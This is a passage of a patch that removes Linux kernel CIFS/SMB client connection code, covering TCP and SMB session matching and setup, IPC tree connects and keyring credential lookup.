+-			if (mids[i] != NULL) {
+-				mids[i]->resp_buf_size = server->pdu_size;
+-
+-				if (bufs[i] && server->ops->is_network_name_deleted)
+-					server->ops->is_network_name_deleted(bufs[i],
+-									server);
+-
+-				if (!mids[i]->multiRsp || mids[i]->multiEnd)
+-					mids[i]->callback(mids[i]);
+-
+-				release_mid(mids[i]);
+-			} else if (server->ops->is_oplock_break &&
+-				   server->ops->is_oplock_break(bufs[i],
+-								server)) {
+-				smb2_add_credits_from_hdr(bufs[i], server);
+-				cifs_dbg(FYI, "Received oplock break\n");
+-			} else {
+-				cifs_server_dbg(VFS, "No task to wake, unknown frame received! NumMids %d\n",
+-						atomic_read(&mid_count));
+-				cifs_dump_mem("Received Data is: ", bufs[i],
+-					      HEADER_SIZE(server));
+-				smb2_add_credits_from_hdr(bufs[i], server);
+-#ifdef CONFIG_CIFS_DEBUG2
+-				if (server->ops->dump_detail)
+-					server->ops->dump_detail(bufs[i],
+-								 server);
+-				cifs_dump_mids(server);
+-#endif /* CIFS_DEBUG2 */
+-			}
+-		}
+-
+-		if (pdu_length > server->pdu_size) {
+-			if (!allocate_buffers(server))
+-				continue;
+-			pdu_length -= server->pdu_size;
+-			server->total_read = 0;
+-			server->large_buf = false;
+-			buf = server->smallbuf;
+-			goto next_pdu;
+-		}
+-	} /* end while !EXITING */
+-
+-	/* buffer usually freed in free_mid - need to free it here on exit */
+-	cifs_buf_release(server->bigbuf);
+-	if (server->smallbuf) /* no sense logging a debug message if NULL */
+-		cifs_small_buf_release(server->smallbuf);
+-
+-	task_to_wake = xchg(&server->tsk, NULL);
+-	clean_demultiplex_info(server);
+-
+-	/* if server->tsk was NULL then wait for a signal before exiting */
+-	if (!task_to_wake) {
+-		set_current_state(TASK_INTERRUPTIBLE);
+-		while (!signal_pending(current)) {
+-			schedule();
+-			set_current_state(TASK_INTERRUPTIBLE);
+-		}
+-		set_current_state(TASK_RUNNING);
+-	}
+-
+-	memalloc_noreclaim_restore(noreclaim_flag);
+-	module_put_and_kthread_exit(0);
+-}
+-
+-/*
+- * Returns true if srcaddr isn't specified and rhs isn't specified, or
+- * if srcaddr is specified and matches the IP address of the rhs argument
+- */
+-bool
+-cifs_match_ipaddr(struct sockaddr *srcaddr, struct sockaddr *rhs)
+-{
+-	switch (srcaddr->sa_family) {
+-	case AF_UNSPEC:
+-		return (rhs->sa_family == AF_UNSPEC);
+-	case AF_INET: {
+-		struct sockaddr_in *saddr4 = (struct sockaddr_in *)srcaddr;
+-		struct sockaddr_in *vaddr4 = (struct sockaddr_in *)rhs;
+-		return (saddr4->sin_addr.s_addr == vaddr4->sin_addr.s_addr);
+-	}
+-	case AF_INET6: {
+-		struct sockaddr_in6 *saddr6 = (struct sockaddr_in6 *)srcaddr;
+-		struct sockaddr_in6 *vaddr6 = (struct sockaddr_in6 *)rhs;
+-		return ipv6_addr_equal(&saddr6->sin6_addr, &vaddr6->sin6_addr);
+-	}
+-	default:
+-		WARN_ON(1);
+-		return false; /* don't expect to be here */
+-	}
+-}
+-
+-/*
+- * If no port is specified in addr structure, we try to match with 445 port
+- * and if it fails - with 139 ports. It should be called only if address
+- * families of server and addr are equal.
+- */
+-static bool
+-match_port(struct TCP_Server_Info *server, struct sockaddr *addr)
+-{
+-	__be16 port, *sport;
+-
+-	/* SMBDirect manages its own ports, don't match it here */
+-	if (server->rdma)
+-		return true;
+-
+-	switch (addr->sa_family) {
+-	case AF_INET:
+-		sport = &((struct sockaddr_in *) &server->dstaddr)->sin_port;
+-		port = ((struct sockaddr_in *) addr)->sin_port;
+-		break;
+-	case AF_INET6:
+-		sport = &((struct sockaddr_in6 *) &server->dstaddr)->sin6_port;
+-		port = ((struct sockaddr_in6 *) addr)->sin6_port;
+-		break;
+-	default:
+-		WARN_ON(1);
+-		return false;
+-	}
+-
+-	if (!port) {
+-		port = htons(CIFS_PORT);
+-		if (port == *sport)
+-			return true;
+-
+-		port = htons(RFC1001_PORT);
+-	}
+-
+-	return port == *sport;
+-}
+-
+-static bool
+-match_address(struct TCP_Server_Info *server, struct sockaddr *addr,
+-	      struct sockaddr *srcaddr)
+-{
+-	switch (addr->sa_family) {
+-	case AF_INET: {
+-		struct sockaddr_in *addr4 = (struct sockaddr_in *)addr;
+-		struct sockaddr_in *srv_addr4 =
+-					(struct sockaddr_in *)&server->dstaddr;
+-
+-		if (addr4->sin_addr.s_addr != srv_addr4->sin_addr.s_addr)
+-			return false;
+-		break;
+-	}
+-	case AF_INET6: {
+-		struct sockaddr_in6 *addr6 = (struct sockaddr_in6 *)addr;
+-		struct sockaddr_in6 *srv_addr6 =
+-					(struct sockaddr_in6 *)&server->dstaddr;
+-
+-		if (!ipv6_addr_equal(&addr6->sin6_addr,
+-				     &srv_addr6->sin6_addr))
+-			return false;
+-		if (addr6->sin6_scope_id != srv_addr6->sin6_scope_id)
+-			return false;
+-		break;
+-	}
+-	default:
+-		WARN_ON(1);
+-		return false; /* don't expect to be here */
+-	}
+-
+-	if (!cifs_match_ipaddr(srcaddr, (struct sockaddr *)&server->srcaddr))
+-		return false;
+-
+-	return true;
+-}
+-
+-static bool
+-match_security(struct TCP_Server_Info *server, struct smb3_fs_context *ctx)
+-{
+-	/*
+-	 * The select_sectype function should either return the ctx->sectype
+-	 * that was specified, or "Unspecified" if that sectype was not
+-	 * compatible with the given NEGOTIATE request.
+-	 */
+-	if (server->ops->select_sectype(server, ctx->sectype)
+-	     == Unspecified)
+-		return false;
+-
+-	/*
+-	 * Now check if signing mode is acceptable. No need to check
+-	 * global_secflags at this point since if MUST_SIGN is set then
+-	 * the server->sign had better be too.
+-	 */
+-	if (ctx->sign && !server->sign)
+-		return false;
+-
+-	return true;
+-}
+-
+-/* this function must be called with srv_lock held */
+-static int match_server(struct TCP_Server_Info *server, struct smb3_fs_context *ctx)
+-{
+-	struct sockaddr *addr = (struct sockaddr *)&ctx->dstaddr;
+-
+-	lockdep_assert_held(&server->srv_lock);
+-
+-	if (ctx->nosharesock)
+-		return 0;
+-
+-	/* this server does not share socket */
+-	if (server->nosharesock)
+-		return 0;
+-
+-	/* If multidialect negotiation see if existing sessions match one */
+-	if (strcmp(ctx->vals->version_string, SMB3ANY_VERSION_STRING) == 0) {
+-		if (server->vals->protocol_id < SMB30_PROT_ID)
+-			return 0;
+-	} else if (strcmp(ctx->vals->version_string,
+-		   SMBDEFAULT_VERSION_STRING) == 0) {
+-		if (server->vals->protocol_id < SMB21_PROT_ID)
+-			return 0;
+-	} else if ((server->vals != ctx->vals) || (server->ops != ctx->ops))
+-		return 0;
+-
+-	if (!net_eq(cifs_net_ns(server), current->nsproxy->net_ns))
+-		return 0;
+-
+-	if (strcasecmp(server->hostname, ctx->server_hostname))
+-		return 0;
+-
+-	if (!match_address(server, addr,
+-			   (struct sockaddr *)&ctx->srcaddr))
+-		return 0;
+-
+-	if (!match_port(server, addr))
+-		return 0;
+-
+-	if (!match_security(server, ctx))
+-		return 0;
+-
+-	if (server->echo_interval != ctx->echo_interval * HZ)
+-		return 0;
+-
+-	if (server->rdma != ctx->rdma)
+-		return 0;
+-
+-	if (server->ignore_signature != ctx->ignore_signature)
+-		return 0;
+-
+-	if (server->min_offload != ctx->min_offload)
+-		return 0;
+-
+-	return 1;
+-}
+-
+-struct TCP_Server_Info *
+-cifs_find_tcp_session(struct smb3_fs_context *ctx)
+-{
+-	struct TCP_Server_Info *server;
+-
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_for_each_entry(server, &cifs_tcp_ses_list, tcp_ses_list) {
+-		spin_lock(&server->srv_lock);
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-		/*
+-		 * DFS failover implementation in cifs_reconnect() requires unique tcp sessions for
+-		 * DFS connections to do failover properly, so avoid sharing them with regular
+-		 * shares or even links that may connect to same server but having completely
+-		 * different failover targets.
+-		 */
+-		if (server->is_dfs_conn) {
+-			spin_unlock(&server->srv_lock);
+-			continue;
+-		}
+-#endif
+-		/*
+-		 * Skip ses channels since they're only handled in lower layers
+-		 * (e.g. cifs_send_recv).
+-		 */
+-		if (CIFS_SERVER_IS_CHAN(server) || !match_server(server, ctx)) {
+-			spin_unlock(&server->srv_lock);
+-			continue;
+-		}
+-		spin_unlock(&server->srv_lock);
+-
+-		++server->srv_count;
+-		spin_unlock(&cifs_tcp_ses_lock);
+-		cifs_dbg(FYI, "Existing tcp session with server found\n");
+-		return server;
+-	}
+-	spin_unlock(&cifs_tcp_ses_lock);
+-	return NULL;
+-}
+-
+-void
+-cifs_put_tcp_session(struct TCP_Server_Info *server, int from_reconnect)
+-{
+-	struct task_struct *task;
+-
+-	spin_lock(&cifs_tcp_ses_lock);
+-	if (--server->srv_count > 0) {
+-		spin_unlock(&cifs_tcp_ses_lock);
+-		return;
+-	}
+-
+-	/* srv_count can never go negative */
+-	WARN_ON(server->srv_count < 0);
+-
+-	put_net(cifs_net_ns(server));
+-
+-	list_del_init(&server->tcp_ses_list);
+-	spin_unlock(&cifs_tcp_ses_lock);
+-
+-	/* For secondary channels, we pick up ref-count on the primary server */
+-	if (CIFS_SERVER_IS_CHAN(server))
+-		cifs_put_tcp_session(server->primary_server, from_reconnect);
+-
+-	cancel_delayed_work_sync(&server->echo);
+-	cancel_delayed_work_sync(&server->resolve);
+-
+-	if (from_reconnect)
+-		/*
+-		 * Avoid deadlock here: reconnect work calls
+-		 * cifs_put_tcp_session() at its end. Need to be sure
+-		 * that reconnect work does nothing with server pointer after
+-		 * that step.
+-		 */
+-		cancel_delayed_work(&server->reconnect);
+-	else
+-		cancel_delayed_work_sync(&server->reconnect);
+-
+-	spin_lock(&server->srv_lock);
+-	server->tcpStatus = CifsExiting;
+-	spin_unlock(&server->srv_lock);
+-
+-	cifs_crypto_secmech_release(server);
+-
+-	kfree_sensitive(server->session_key.response);
+-	server->session_key.response = NULL;
+-	server->session_key.len = 0;
+-	kfree(server->hostname);
+-	server->hostname = NULL;
+-
+-	task = xchg(&server->tsk, NULL);
+-	if (task)
+-		send_sig(SIGKILL, task, 1);
+-}
+-
+-struct TCP_Server_Info *
+-cifs_get_tcp_session(struct smb3_fs_context *ctx,
+-		     struct TCP_Server_Info *primary_server)
+-{
+-	struct TCP_Server_Info *tcp_ses = NULL;
+-	int rc;
+-
+-	cifs_dbg(FYI, "UNC: %s\n", ctx->UNC);
+-
+-	/* see if we already have a matching tcp_ses */
+-	tcp_ses = cifs_find_tcp_session(ctx);
+-	if (tcp_ses)
+-		return tcp_ses;
+-
+-	tcp_ses = kzalloc(sizeof(struct TCP_Server_Info), GFP_KERNEL);
+-	if (!tcp_ses) {
+-		rc = -ENOMEM;
+-		goto out_err;
+-	}
+-
+-	tcp_ses->hostname = kstrdup(ctx->server_hostname, GFP_KERNEL);
+-	if (!tcp_ses->hostname) {
+-		rc = -ENOMEM;
+-		goto out_err;
+-	}
+-
+-	if (ctx->nosharesock)
+-		tcp_ses->nosharesock = true;
+-
+-	tcp_ses->ops = ctx->ops;
+-	tcp_ses->vals = ctx->vals;
+-	cifs_set_net_ns(tcp_ses, get_net(current->nsproxy->net_ns));
+-
+-	tcp_ses->conn_id = atomic_inc_return(&tcpSesNextId);
+-	tcp_ses->noblockcnt = ctx->rootfs;
+-	tcp_ses->noblocksnd = ctx->noblocksnd || ctx->rootfs;
+-	tcp_ses->noautotune = ctx->noautotune;
+-	tcp_ses->tcp_nodelay = ctx->sockopt_tcp_nodelay;
+-	tcp_ses->rdma = ctx->rdma;
+-	tcp_ses->in_flight = 0;
+-	tcp_ses->max_in_flight = 0;
+-	tcp_ses->credits = 1;
+-	if (primary_server) {
+-		spin_lock(&cifs_tcp_ses_lock);
+-		++primary_server->srv_count;
+-		spin_unlock(&cifs_tcp_ses_lock);
+-		tcp_ses->primary_server = primary_server;
+-	}
+-	init_waitqueue_head(&tcp_ses->response_q);
+-	init_waitqueue_head(&tcp_ses->request_q);
+-	INIT_LIST_HEAD(&tcp_ses->pending_mid_q);
+-	mutex_init(&tcp_ses->_srv_mutex);
+-	memcpy(tcp_ses->workstation_RFC1001_name,
+-		ctx->source_rfc1001_name, RFC1001_NAME_LEN_WITH_NULL);
+-	memcpy(tcp_ses->server_RFC1001_name,
+-		ctx->target_rfc1001_name, RFC1001_NAME_LEN_WITH_NULL);
+-	tcp_ses->session_estab = false;
+-	tcp_ses->sequence_number = 0;
+-	tcp_ses->reconnect_instance = 1;
+-	tcp_ses->lstrp = jiffies;
+-	tcp_ses->compress_algorithm = cpu_to_le16(ctx->compression);
+-	spin_lock_init(&tcp_ses->req_lock);
+-	spin_lock_init(&tcp_ses->srv_lock);
+-	spin_lock_init(&tcp_ses->mid_lock);
+-	INIT_LIST_HEAD(&tcp_ses->tcp_ses_list);
+-	INIT_LIST_HEAD(&tcp_ses->smb_ses_list);
+-	INIT_DELAYED_WORK(&tcp_ses->echo, cifs_echo_request);
+-	INIT_DELAYED_WORK(&tcp_ses->resolve, cifs_resolve_server);
+-	INIT_DELAYED_WORK(&tcp_ses->reconnect, smb2_reconnect_server);
+-	mutex_init(&tcp_ses->reconnect_mutex);
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-	mutex_init(&tcp_ses->refpath_lock);
+-#endif
+-	memcpy(&tcp_ses->srcaddr, &ctx->srcaddr,
+-	       sizeof(tcp_ses->srcaddr));
+-	memcpy(&tcp_ses->dstaddr, &ctx->dstaddr,
+-		sizeof(tcp_ses->dstaddr));
+-	if (ctx->use_client_guid)
+-		memcpy(tcp_ses->client_guid, ctx->client_guid,
+-		       SMB2_CLIENT_GUID_SIZE);
+-	else
+-		generate_random_uuid(tcp_ses->client_guid);
+-	/*
+-	 * at this point we are the only ones with the pointer
+-	 * to the struct since the kernel thread not created yet
+-	 * no need to spinlock this init of tcpStatus or srv_count
+-	 */
+-	tcp_ses->tcpStatus = CifsNew;
+-	++tcp_ses->srv_count;
+-
+-	if (ctx->echo_interval >= SMB_ECHO_INTERVAL_MIN &&
+-		ctx->echo_interval <= SMB_ECHO_INTERVAL_MAX)
+-		tcp_ses->echo_interval = ctx->echo_interval * HZ;
+-	else
+-		tcp_ses->echo_interval = SMB_ECHO_INTERVAL_DEFAULT * HZ;
+-	if (tcp_ses->rdma) {
+-#ifndef CONFIG_CIFS_SMB_DIRECT
+-		cifs_dbg(VFS, "CONFIG_CIFS_SMB_DIRECT is not enabled\n");
+-		rc = -ENOENT;
+-		goto out_err_crypto_release;
+-#endif
+-		tcp_ses->smbd_conn = smbd_get_connection(
+-			tcp_ses, (struct sockaddr *)&ctx->dstaddr);
+-		if (tcp_ses->smbd_conn) {
+-			cifs_dbg(VFS, "RDMA transport established\n");
+-			rc = 0;
+-			goto smbd_connected;
+-		} else {
+-			rc = -ENOENT;
+-			goto out_err_crypto_release;
+-		}
+-	}
+-	rc = ip_connect(tcp_ses);
+-	if (rc < 0) {
+-		cifs_dbg(VFS, "Error connecting to socket. Aborting operation.\n");
+-		goto out_err_crypto_release;
+-	}
+-smbd_connected:
+-	/*
+-	 * since we're in a cifs function already, we know that
+-	 * this will succeed. No need for try_module_get().
+-	 */
+-	__module_get(THIS_MODULE);
+-	tcp_ses->tsk = kthread_run(cifs_demultiplex_thread,
+-				  tcp_ses, "cifsd");
+-	if (IS_ERR(tcp_ses->tsk)) {
+-		rc = PTR_ERR(tcp_ses->tsk);
+-		cifs_dbg(VFS, "error %d create cifsd thread\n", rc);
+-		module_put(THIS_MODULE);
+-		goto out_err_crypto_release;
+-	}
+-	tcp_ses->min_offload = ctx->min_offload;
+-	/*
+-	 * at this point we are the only ones with the pointer
+-	 * to the struct since the kernel thread not created yet
+-	 * no need to spinlock this update of tcpStatus
+-	 */
+-	spin_lock(&tcp_ses->srv_lock);
+-	tcp_ses->tcpStatus = CifsNeedNegotiate;
+-	spin_unlock(&tcp_ses->srv_lock);
+-
+-	if ((ctx->max_credits < 20) || (ctx->max_credits > 60000))
+-		tcp_ses->max_credits = SMB2_MAX_CREDITS_AVAILABLE;
+-	else
+-		tcp_ses->max_credits = ctx->max_credits;
+-
+-	tcp_ses->nr_targets = 1;
+-	tcp_ses->ignore_signature = ctx->ignore_signature;
+-	/* thread spawned, put it on the list */
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_add(&tcp_ses->tcp_ses_list, &cifs_tcp_ses_list);
+-	spin_unlock(&cifs_tcp_ses_lock);
+-
+-	/* queue echo request delayed work */
+-	queue_delayed_work(cifsiod_wq, &tcp_ses->echo, tcp_ses->echo_interval);
+-
+-	/* queue dns resolution delayed work */
+-	cifs_dbg(FYI, "%s: next dns resolution scheduled for %d seconds in the future\n",
+-		 __func__, SMB_DNS_RESOLVE_INTERVAL_DEFAULT);
+-
+-	queue_delayed_work(cifsiod_wq, &tcp_ses->resolve, (SMB_DNS_RESOLVE_INTERVAL_DEFAULT * HZ));
+-
+-	return tcp_ses;
+-
+-out_err_crypto_release:
+-	cifs_crypto_secmech_release(tcp_ses);
+-
+-	put_net(cifs_net_ns(tcp_ses));
+-
+-out_err:
+-	if (tcp_ses) {
+-		if (CIFS_SERVER_IS_CHAN(tcp_ses))
+-			cifs_put_tcp_session(tcp_ses->primary_server, false);
+-		kfree(tcp_ses->hostname);
+-		if (tcp_ses->ssocket)
+-			sock_release(tcp_ses->ssocket);
+-		kfree(tcp_ses);
+-	}
+-	return ERR_PTR(rc);
+-}
+-
+-/* this function must be called with ses_lock and chan_lock held */
+-static int match_session(struct cifs_ses *ses, struct smb3_fs_context *ctx)
+-{
+-	if (ctx->sectype != Unspecified &&
+-	    ctx->sectype != ses->sectype)
+-		return 0;
+-
+-	/*
+-	 * If an existing session is limited to less channels than
+-	 * requested, it should not be reused
+-	 */
+-	if (ses->chan_max < ctx->max_channels)
+-		return 0;
+-
+-	switch (ses->sectype) {
+-	case Kerberos:
+-		if (!uid_eq(ctx->cred_uid, ses->cred_uid))
+-			return 0;
+-		break;
+-	default:
+-		/* NULL username means anonymous session */
+-		if (ses->user_name == NULL) {
+-			if (!ctx->nullauth)
+-				return 0;
+-			break;
+-		}
+-
+-		/* anything else takes username/password */
+-		if (strncmp(ses->user_name,
+-			    ctx->username ? ctx->username : "",
+-			    CIFS_MAX_USERNAME_LEN))
+-			return 0;
+-		if ((ctx->username && strlen(ctx->username) != 0) &&
+-		    ses->password != NULL &&
+-		    strncmp(ses->password,
+-			    ctx->password ? ctx->password : "",
+-			    CIFS_MAX_PASSWORD_LEN))
+-			return 0;
+-	}
+-	return 1;
+-}
+-
+-/**
+- * cifs_setup_ipc - helper to setup the IPC tcon for the session
+- * @ses: smb session to issue the request on
+- * @ctx: the superblock configuration context to use for building the
+- *       new tree connection for the IPC (interprocess communication RPC)
+- *
+- * A new IPC connection is made and stored in the session
+- * tcon_ipc. The IPC tcon has the same lifetime as the session.
+- */
+-static int
+-cifs_setup_ipc(struct cifs_ses *ses, struct smb3_fs_context *ctx)
+-{
+-	int rc = 0, xid;
+-	struct cifs_tcon *tcon;
+-	char unc[SERVER_NAME_LENGTH + sizeof("//x/IPC$")] = {0};
+-	bool seal = false;
+-	struct TCP_Server_Info *server = ses->server;
+-
+-	/*
+-	 * If the mount request that resulted in the creation of the
+-	 * session requires encryption, force IPC to be encrypted too.
+-	 */
+-	if (ctx->seal) {
+-		if (server->capabilities & SMB2_GLOBAL_CAP_ENCRYPTION)
+-			seal = true;
+-		else {
+-			cifs_server_dbg(VFS,
+-				 "IPC: server doesn't support encryption\n");
+-			return -EOPNOTSUPP;
+-		}
+-	}
+-
+-	tcon = tconInfoAlloc();
+-	if (tcon == NULL)
+-		return -ENOMEM;
+-
+-	spin_lock(&server->srv_lock);
+-	scnprintf(unc, sizeof(unc), "\\\\%s\\IPC$", server->hostname);
+-	spin_unlock(&server->srv_lock);
+-
+-	xid = get_xid();
+-	tcon->ses = ses;
+-	tcon->ipc = true;
+-	tcon->seal = seal;
+-	rc = server->ops->tree_connect(xid, ses, unc, tcon, ctx->local_nls);
+-	free_xid(xid);
+-
+-	if (rc) {
+-		cifs_server_dbg(VFS, "failed to connect to IPC (rc=%d)\n", rc);
+-		tconInfoFree(tcon);
+-		goto out;
+-	}
+-
+-	cifs_dbg(FYI, "IPC tcon rc=%d ipc tid=0x%x\n", rc, tcon->tid);
+-
+-	spin_lock(&tcon->tc_lock);
+-	tcon->status = TID_GOOD;
+-	spin_unlock(&tcon->tc_lock);
+-	ses->tcon_ipc = tcon;
+-out:
+-	return rc;
+-}
+-
+-/**
+- * cifs_free_ipc - helper to release the session IPC tcon
+- * @ses: smb session to unmount the IPC from
+- *
+- * Needs to be called everytime a session is destroyed.
+- *
+- * On session close, the IPC is closed and the server must release all tcons of the session.
+- * No need to send a tree disconnect here.
+- *
+- * Besides, it will make the server to not close durable and resilient files on session close, as
+- * specified in MS-SMB2 3.3.5.6 Receiving an SMB2 LOGOFF Request.
+- */
+-static int
+-cifs_free_ipc(struct cifs_ses *ses)
+-{
+-	struct cifs_tcon *tcon = ses->tcon_ipc;
+-
+-	if (tcon == NULL)
+-		return 0;
+-
+-	tconInfoFree(tcon);
+-	ses->tcon_ipc = NULL;
+-	return 0;
+-}
+-
+-static struct cifs_ses *
+-cifs_find_smb_ses(struct TCP_Server_Info *server, struct smb3_fs_context *ctx)
+-{
+-	struct cifs_ses *ses;
+-
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
+-		spin_lock(&ses->ses_lock);
+-		if (ses->ses_status == SES_EXITING) {
+-			spin_unlock(&ses->ses_lock);
+-			continue;
+-		}
+-		spin_lock(&ses->chan_lock);
+-		if (!match_session(ses, ctx)) {
+-			spin_unlock(&ses->chan_lock);
+-			spin_unlock(&ses->ses_lock);
+-			continue;
+-		}
+-		spin_unlock(&ses->chan_lock);
+-		spin_unlock(&ses->ses_lock);
+-
+-		++ses->ses_count;
+-		spin_unlock(&cifs_tcp_ses_lock);
+-		return ses;
+-	}
+-	spin_unlock(&cifs_tcp_ses_lock);
+-	return NULL;
+-}
+-
+-void cifs_put_smb_ses(struct cifs_ses *ses)
+-{
+-	unsigned int rc, xid;
+-	unsigned int chan_count;
+-	struct TCP_Server_Info *server = ses->server;
+-
+-	spin_lock(&ses->ses_lock);
+-	if (ses->ses_status == SES_EXITING) {
+-		spin_unlock(&ses->ses_lock);
+-		return;
+-	}
+-	spin_unlock(&ses->ses_lock);
+-
+-	cifs_dbg(FYI, "%s: ses_count=%d\n", __func__, ses->ses_count);
+-	cifs_dbg(FYI,
+-		 "%s: ses ipc: %s\n", __func__, ses->tcon_ipc ? ses->tcon_ipc->tree_name : "NONE");
+-
+-	spin_lock(&cifs_tcp_ses_lock);
+-	if (--ses->ses_count > 0) {
+-		spin_unlock(&cifs_tcp_ses_lock);
+-		return;
+-	}
+-	spin_unlock(&cifs_tcp_ses_lock);
+-
+-	/* ses_count can never go negative */
+-	WARN_ON(ses->ses_count < 0);
+-
+-	if (ses->ses_status == SES_GOOD)
+-		ses->ses_status = SES_EXITING;
+-
+-	cifs_free_ipc(ses);
+-
+-	if (ses->ses_status == SES_EXITING && server->ops->logoff) {
+-		xid = get_xid();
+-		rc = server->ops->logoff(xid, ses);
+-		if (rc)
+-			cifs_server_dbg(VFS, "%s: Session Logoff failure rc=%d\n",
+-				__func__, rc);
+-		_free_xid(xid);
+-	}
+-
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_del_init(&ses->smb_ses_list);
+-	spin_unlock(&cifs_tcp_ses_lock);
+-
+-	chan_count = ses->chan_count;
+-
+-	/* close any extra channels */
+-	if (chan_count > 1) {
+-		int i;
+-
+-		for (i = 1; i < chan_count; i++) {
+-			if (ses->chans[i].iface) {
+-				kref_put(&ses->chans[i].iface->refcount, release_iface);
+-				ses->chans[i].iface = NULL;
+-			}
+-			cifs_put_tcp_session(ses->chans[i].server, 0);
+-			ses->chans[i].server = NULL;
+-		}
+-	}
+-
+-	sesInfoFree(ses);
+-	cifs_put_tcp_session(server, 0);
+-}
+-
+-#ifdef CONFIG_KEYS
+-
+-/* strlen("cifs:a:") + CIFS_MAX_DOMAINNAME_LEN + 1 */
+-#define CIFSCREDS_DESC_SIZE (7 + CIFS_MAX_DOMAINNAME_LEN + 1)
+-
+-/* Populate username and pw fields from keyring if possible */
+-static int
+-cifs_set_cifscreds(struct smb3_fs_context *ctx, struct cifs_ses *ses)
+-{
+-	int rc = 0;
+-	int is_domain = 0;
+-	const char *delim, *payload;
+-	char *desc;
+-	ssize_t len;
+-	struct key *key;
+-	struct TCP_Server_Info *server = ses->server;
+-	struct sockaddr_in *sa;
+-	struct sockaddr_in6 *sa6;
+-	const struct user_key_payload *upayload;
+-
+-	desc = kmalloc(CIFSCREDS_DESC_SIZE, GFP_KERNEL);
+-	if (!desc)
+-		return -ENOMEM;
+-
+-	/* try to find an address key first */
+-	switch (server->dstaddr.ss_family) {
+-	case AF_INET:
+-		sa = (struct sockaddr_in *)&server->dstaddr;
+-		sprintf(desc, "cifs:a:%pI4", &sa->sin_addr.s_addr);
+-		break;
+-	case AF_INET6:
+-		sa6 = (struct sockaddr_in6 *)&server->dstaddr;
+-		sprintf(desc, "cifs:a:%pI6c", &sa6->sin6_addr.s6_addr);
+-		break;
+-	default:
+-		cifs_dbg(FYI, "Bad ss_family (%hu)\n",
+-			 server->dstaddr.ss_family);
+-		rc = -EINVAL;
+-		goto out_err;
+-	}
+-
+-	cifs_dbg(FYI, "%s: desc=%s\n", __func__, desc);
+-	key = request_key(&key_type_logon, desc, "");
+-	if (IS_ERR(key)) {
+-		if (!ses->domainName) {
+-			cifs_dbg(FYI, "domainName is NULL\n");
+-			rc = PTR_ERR(key);
+-			goto out_err;
+-		}
+-
+-		/* didn't work, try to find a domain key */
+-		sprintf(desc, "cifs:d:%s", ses->domainName);
+-		cifs_dbg(FYI, "%s: desc=%s\n", __func__, desc);
+-		key = request_key(&key_type_logon, desc, "");
+-		if (IS_ERR(key)) {
+-			rc = PTR_ERR(key);
+-			goto out_err;
+-		}
+-		is_domain = 1;
+-	}
+-
+-	down_read(&key->sem);
+-	upayload = user_key_payload_locked(key);
+-	if (IS_ERR_OR_NULL(upayload)) {
+-		rc = upayload ? PTR_ERR(upayload) : -EINVAL;
+-		goto out_key_put;
+-	}
+-
+-	/* find first : in payload */
+-	payload = upayload->data;
+-	delim = strnchr(payload, upayload->datalen, ':');
+-	cifs_dbg(FYI, "payload=%s\n", payload);
+-	if (!delim) {
+-		cifs_dbg(FYI, "Unable to find ':' in payload (datalen=%d)\n",
+-			 upayload->datalen);
+-		rc = -EINVAL;
+-		goto out_key_put;
+-	}
+-
+-	len = delim - payload;
+-	if (len > CIFS_MAX_USERNAME_LEN || len <= 0) {
+-		cifs_dbg(FYI, "Bad value from username search (len=%zd)\n",
+-			 len);
+-		rc = -EINVAL;
+-		goto out_key_put;
+-	}
+-
+-	ctx->username = kstrndup(payload, len, GFP_KERNEL);
+-	if (!ctx->username) {
+-		cifs_dbg(FYI, "Unable to allocate %zd bytes for username\n",
+-			 len);
+-		rc = -ENOMEM;
+-		goto out_key_put;
+-	}
+-	cifs_dbg(FYI, "%s: username=%s\n", __func__, ctx->username);
+-
+-	len = key->datalen - (len + 1);
+-	if (len > CIFS_MAX_PASSWORD_LEN || len <= 0) {
+-		cifs_dbg(FYI, "Bad len for password search (len=%zd)\n", len);
+-		rc = -EINVAL;
+-		kfree(ctx->username);
+-		ctx->username = NULL;
+-		goto out_key_put;
+-	}
+-
+-	++delim;
+-	ctx->password = kstrndup(delim, len, GFP_KERNEL);
+-	if (!ctx->password) {
+-		cifs_dbg(FYI, "Unable to allocate %zd bytes for password\n",
+-			 len);
+-		rc = -ENOMEM;
+-		kfree(ctx->username);
+-		ctx->username = NULL;
+-		goto out_key_put;
+-	}
+-
+-	/*
+-	 * If we have a domain key then we must set the domainName in the
+-	 * for the request.
+-	 */
+-	if (is_domain && ses->domainName) {
+-		ctx->domainname = kstrdup(ses->domainName, GFP_KERNEL);
+-		if (!ctx->domainname) {
+-			cifs_dbg(FYI, "Unable to allocate %zd bytes for domain\n",
+-				 len);
+-			rc = -ENOMEM;
+-			kfree(ctx->username);
+-			ctx->username = NULL;
+-			kfree_sensitive(ctx->password);
+-			ctx->password = NULL;
+-			goto out_key_put;
+-		}
+-	}
+-
+-	strscpy(ctx->workstation_name, ses->workstation_name, sizeof(ctx->workstation_name));
+-
+-out_key_put:
+-	up_read(&key->sem);
+-	key_put(key);
+-out_err:
+-	kfree(desc);
+-	cifs_dbg(FYI, "%s: returning %d\n", __func__, rc);
+-	return rc;
+-}
+-#else /* ! CONFIG_KEYS */
+-static inline int
+-cifs_set_cifscreds(struct smb3_fs_context *ctx __attribute__((unused)),
+-		   struct cifs_ses *ses __attribute__((unused)))
+-{
+-	return -ENOSYS;
+-}
+-#endif /* CONFIG_KEYS */
+-
+-/**
+- * cifs_get_smb_ses - get a session matching @ctx data from @server
+- * @server: server to setup the session to
+- * @ctx: superblock configuration context to use to setup the session
+- *
+- * This function assumes it is being called from cifs_mount() where we
+- * already got a server reference (server refcount +1). See
+- * cifs_get_tcon() for refcount explanations.
+- */
+-struct cifs_ses *
+-cifs_get_smb_ses(struct TCP_Server_Info *server, struct smb3_fs_context *ctx)
+-{
+-	int rc = 0;
+-	unsigned int xid;
+-	struct cifs_ses *ses;
+-	struct sockaddr_in *addr = (struct sockaddr_in *)&server->dstaddr;
+-	struct sockaddr_in6 *addr6 = (struct sockaddr_in6 *)&server->dstaddr;
+-
+-	xid = get_xid();
+-
+-	ses = cifs_find_smb_ses(server, ctx);
+-	if (ses) {
+-		cifs_dbg(FYI, "Existing smb sess found (status=%d)\n",
+-			 ses->ses_status);
+-
+-		spin_lock(&ses->chan_lock);
